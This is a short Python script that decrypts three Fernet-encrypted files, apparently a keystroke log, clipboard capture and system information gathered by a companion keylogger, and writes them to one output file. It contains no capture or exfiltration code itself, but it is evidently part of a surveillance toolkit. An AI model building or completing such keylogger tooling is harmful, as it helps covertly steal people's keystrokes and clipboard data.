from cryptography.fernet import Fernet

encryption_key = " " #Enter the key generated by running KeyGeneration.py

encrypted_key_log_file = "encrypted_key_log.txt"
encrypted_system_info_file = "encrypted_system_info.txt"
encrypted_clipboard_file = "encrypted_clipboard.txt"

encrypted_files = [encrypted_system_info_file, encrypted_clipboard_file, encrypted_key_log_file]
count = 0


for decrypting_files in encrypted_files:

    with open(encrypted_files[count], 'rb') as f:
        data = f.read()

    fernet = Fernet(encryption_key)
    decrypted = fernet.decrypt(data)

    with open("decryption.txt", 'ab') as f:
        f.write(decrypted)

    count += 1
